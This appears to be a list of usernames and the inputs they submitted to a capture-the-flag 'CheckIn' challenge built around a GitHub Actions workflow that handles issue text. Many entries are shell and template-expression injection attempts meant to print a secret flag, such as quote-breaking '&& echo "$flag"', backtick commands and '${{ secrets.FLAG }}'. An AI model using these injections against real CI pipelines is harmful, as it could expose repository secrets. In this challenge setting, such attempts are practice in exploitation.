nt1dr:
EarthCompass:
ZM-J:SIBAL
CENLG-AWSL:？
truda8:CheckIn
po1ng:just
karzanWang:
ihopenot:
nt1dr:"
ihopenot:" && ls
nt1dr:${{ env.flag }}
${{ secrets[flag] }}
nt1dr:${{ secrets[FLAG] }}
X1ngn:
nt1dr:${{ env.flag }}
Dev0ke:$flag
weinull:" && echo "$flag" >> issues
afsmaira:
DD6181S03:" env.flag ""
Fraista:$flag
DD6181S03:" ${{ env.flag }} ""
emocat:\" && ls;
foreverhza:12243
ha1c9on:${env}
foreverhza:${{ secrets.FLAG }}
haonana-caiji:
youyue271:123 " &&  echo "$flag:$flag
weinull:" || echo "$flag:
CHENDAHUYOU:1
GerryGuoGuo:
ZhaoQi99:" | echo "$flag:
zeroc2537:
Fraista:abc
test
weinull:"${{ secrets.FLAG }}"
weinull:\"${{ secrets.FLAG }}\"
karzanWang:curl \
  -H "Accept: application/vnd.github.v3+json" \
  https://api.github.com/repos/CheckInChallenge/CheckIn/actions/secrets/FLAG
zeroc2537:
tyskill:$flag
haonana-caiji:123
pecof:test
coderjingluo:test
GerryGuoGuo:flag
X1ngn:`echo aaa >> issue`
truda8:$user:$flag
yaoge1225:
X1ngn:;echo aaa >> issues;
zeroc2537:456" && echo "123
mukeran:
X1ngn:`echo aaa >> issues`
karzanWang:456" && echo "123
ZhaoQi99:asd}}" echo "$user:$flag" >> issues
zeroc2537:" " echo 123
